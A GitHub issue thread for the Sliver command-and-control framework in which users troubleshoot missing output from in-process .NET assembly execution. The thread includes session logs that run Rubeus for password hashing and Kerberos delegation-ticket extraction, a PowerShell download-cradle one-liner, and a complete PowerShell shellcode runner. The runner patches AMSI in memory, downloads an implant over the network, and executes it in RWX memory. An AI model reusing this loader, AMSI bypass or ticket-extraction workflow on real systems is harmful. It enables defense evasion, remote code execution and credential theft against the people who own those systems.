
In-process .NET assembly execution does not always return output

Open senzee1984 opened this issue 2 years ago • 19 comments

Describe the bug
If the execution happens in the process, there is no output.

To Reproduce
Steps to reproduce the behavior:

  1. Generate a session stager implant, and execute it.
  2. Select the session, and execute any .NET exe with option -i
  3. Observe that there is no output

Expected behavior
I am not sure whether this is intended behavior for in-process execution. @MrAle98 mentioned that if --debug is enabled when generating an implant, we can see the output. Since I generated a stager implant, there is no debug option.


[server] sliver (WELL-KNOWN_UNION) > execute-assembly /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (WELL-KNOWN_UNION) > execute-assembly -i /opt/red/rubeus.exe hash /password:123

[*] Output:

Desktop (please complete the following information):

  • OS: Kali
  • Version: 1.5.33

Additional context
The session is obtained from a stager session implant.

senzee1984 avatar Jan 10 '23 01:01 senzee1984

A reference:

senzee1984 avatar Jan 10 '23 01:01 senzee1984

@rkervella is this something weird to do with the stdout shenanigans?

moloch-- avatar Jan 10 '23 01:01 moloch--

Yeah I believe it's an issue with go-clr, I'll have a look.

rkervella avatar Jan 10 '23 03:01 rkervella

@ziyishen97 have you tried with the --amsi-bypass and or --etw-bypass flags?

rkervella avatar Jan 16 '23 22:01 rkervella

Removing the bug tag since I'm unable to reproduce on both Windows 11 and Windows 2019.

rkervella avatar Jan 16 '23 23:01 rkervella

The same result:

sliver (STRAIGHT_WILLOW) > execute-assembly  -i -M -E /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 avatar Jan 17 '23 15:01 senzee1984

Additional information: I cannot get any output from the Sliver CLI; however, the output is displayed in the process, e.g. the PowerShell CLI. I used a PowerShell download cradle to get a session; when I execute a .NET assembly, the output is displayed in the PowerShell CLI.

PS C:\Windows\system32> iex(new-object net.webclient).downloadstring('')
Downloading sliver.bin

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 Are you using the fork? May I suggest that you first try with the latest release of Sliver and check if you still get the issue?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

@MrAle98 I am using the latest version, and manually modified a few files to include the PowerShell command.

All hackers gain exalted
[*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 Do you keep getting the same issue also without your modifications? Do you have the same issue with beacon type implants?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

I tried with the latest binary release; it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

senzee1984 avatar Jan 17 '23 15:01 senzee1984

@ziyishen97 among your modifications is there anything that modifies the implant?

MrAle98 avatar Jan 17 '23 15:01 MrAle98

@MrAle98 I made modifications based on the comparison

senzee1984 avatar Jan 17 '23 16:01 senzee1984

@ziyishen97 In the branch you took there are no modifications on the implant side. It is weird that with the modifications added you can't retrieve the output...

MrAle98 avatar Jan 17 '23 16:01 MrAle98

Okay, I found there is an inconsistency between sessions. I am using the official latest version. The SYSTEM session has output, while other users' sessions (including local admin) do not. @MrAle98

[server] sliver (AGREEABLE_SPIRITUAL) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

[*] rto has joined the game

[*] rto has joined the game

[server] sliver (AGREEABLE_SPIRITUAL) > sessions

 ID         Transport   Remote Address       Hostname   Username              Operating System   Health  
========== =========== ==================== ========== ===================== ================== =========
 1e58be58   http(s)   web01      CHILD\david           windows/amd64      [ALIVE] 
 21084a77   http(s)   web01      NT AUTHORITY\SYSTEM   windows/amd64      [ALIVE] 
 cf73a9d6   http(s)   web01      CHILD\eric            windows/amd64      [ALIVE] 
 a94ef7ea   http(s)   web01      CHILD\eric            windows/amd64      [ALIVE] 

[server] sliver (AGREEABLE_SPIRITUAL) > use 21084a77-c18c-4bf6-8a7d-5addda81f83a

[*] Active session STRAIGHT_WILLOW (21084a77-c18c-4bf6-8a7d-5addda81f83a)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (STRAIGHT_WILLOW) > use cf73a9d6-2324-4eb5-8602-393091a2fe9c

[*] Active session STRAIGHT_WILLOW (cf73a9d6-2324-4eb5-8602-393091a2fe9c)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 avatar Jan 17 '23 16:01 senzee1984

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session is obtained by executing a PowerShell shellcode runner:

[server] sliver (ILL_FURNACE) > execute-assembly /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):


[server] sliver (ILL_FURNACE) > execute-assembly --i /opt/red/rubeus.exe tgtdeleg /nowrap
error: invalid flag: --i
[server] sliver (ILL_FURNACE) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

The contents of the PowerShell shellcode runner:

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))

function getDelegateType {
    Param (
     [Parameter(Position = 0, Mandatory = $True)] [Type[]]
     $func, [Parameter(Position = 1)] [Type] $delType = [Void]
    $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
    DefineDynamicModule('InMemoryModule', $false).
    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
    AutoClass', [System.MulticastDelegate])

    DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
     SetImplementationFlags('Runtime, Managed')

    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()

[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]] (0x48, 0x31, 0xC0) 
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)

Write-Host 'Downloading sliver.bin'
[Byte[]] $buf = (New-Object Net.Webclient).DownloadData('')
$lpMem =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $buf.length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)

However, it looks like only the stager implant has this issue; a stageless implant or a spawned session (getsystem) does not.

[server] sliver (ILL_FURNACE) > generate --http -f exe --debug --save /opt/red/sliver.exe

[*] Generating new windows/amd64 implant binary
[*] Build completed in 15s
[*] Implant saved to /opt/red/sliver.exe

[*] Session d7040874 ABSOLUTE_ADULTHOOD - (web01) - windows/amd64 - Tue, 24 Jan 2023 18:32:36 PST

[server] sliver (ILL_FURNACE) > use d7040874-2ab9-4e04-b55a-3eaabc7c539f

[*] Active session ABSOLUTE_ADULTHOOD (d7040874-2ab9-4e04-b55a-3eaabc7c539f)

[server] sliver (ABSOLUTE_ADULTHOOD) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):


senzee1984 avatar Jan 25 '23 02:01 senzee1984

I am also seeing this issue on v1.5.31 for both beacons and sessions; staged and stageless.

[*] Server v1.5.31 - d699a8d1401f89fc235cb4bfc4cf58feee87308a - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

Output DOES appear when the shellcode loader is a Console Application, but does NOT return in Sliver console.

gregohmyeggo avatar Feb 27 '23 15:02 gregohmyeggo

The go-clr library we're using has been updated, and might fix some of these issues. @senzee1984 @gregohmyeggo if you're feeling adventurous, you can try to compile from the master branch and test it out.

rkervella avatar Mar 02 '23 22:03 rkervella
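rkervella attributes the missing output to go-clr's stdout handling, and gregohmyeggo notes that the text does show up when the loader is a console application. The Go program below is an added illustration, not code from Sliver or go-clr, of one layering problem that produces exactly that symptom: the capturing side swaps os.Stdout for a pipe, but a writer that bound the original stdout handle before the swap (simulated here by a package-level variable that copies os.Stdout at init, an assumption about the failure mode rather than go-clr's real code) keeps writing to the original console and never reaches the capture.

```go
package main

import (
	"fmt"
	"io"
	"os"
	"strings"
)

// cachedStdout imitates a runtime that resolved its stdout handle once at
// startup (an assumption about the failure mode, not go-clr's actual code):
// the copy is taken at package init, before any redirection happens.
var cachedStdout = os.Stdout

// CaptureStdout runs fn with os.Stdout swapped for the write end of a pipe
// and returns everything fn wrote through os.Stdout. Writes that bypass
// os.Stdout (for example through cachedStdout) go to the real console and
// are absent from the returned string.
func CaptureStdout(fn func()) (string, error) {
	r, w, err := os.Pipe()
	if err != nil {
		return "", err
	}
	orig := os.Stdout
	os.Stdout = w

	// Drain the pipe concurrently so a large write inside fn cannot deadlock.
	done := make(chan struct{})
	var captured []byte
	go func() {
		captured, _ = io.ReadAll(r)
		close(done)
	}()

	fn()

	// Restore the original handle and close the writer so ReadAll sees EOF.
	os.Stdout = orig
	w.Close()
	<-done
	r.Close()
	return string(captured), nil
}

// LateBound resolves os.Stdout at call time, so the redirection catches it.
func LateBound(msg string) {
	fmt.Fprintln(os.Stdout, msg)
}

// EarlyBound writes through the handle cached at init, so it escapes capture
// and lands on the host process's own console instead.
func EarlyBound(msg string) {
	fmt.Fprintln(cachedStdout, msg)
}

// Demo runs both writers under capture and returns what the capturer saw.
func Demo() (string, error) {
	return CaptureStdout(func() {
		LateBound("captured: written via os.Stdout after the swap")
		EarlyBound("lost: written via a handle bound before the swap")
	})
}

func main() {
	out, err := Demo()
	if err != nil {
		panic(err)
	}
	// Only the late-bound line comes back; the early-bound one was printed
	// straight to the terminal above this summary.
	fmt.Printf("capturer received %d line(s):\n%s", strings.Count(out, "\n"), out)
}
```

Running it prints the "lost" line directly on the terminal and only the "captured" line in the capturer's summary, which mirrors the thread's report: the assembly's text is visible in the host process's console but never arrives at the operator's console. A capture mechanism that relies on swapping a handle after the writer has already bound it cannot see that writer's output, whichever layer (process handle table, runtime console object, or language-level stream) the binding happened at.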

Getting the same behavior on v1.5.41

With a freshly compiled Seatbelt, --in-process does not yield any output, while without this option it behaves as intended. Apologies for the lack of troubleshooting done on my end; just putting this here for tracking.

The implant process is a .NET 6.0 console app, tried in an interactive session.


Tested another implant, .NET 7.0, single-file self-contained published assembly, and I got the output back on both session and beacon.

Selora avatar Dec 02 '23 23:12 Selora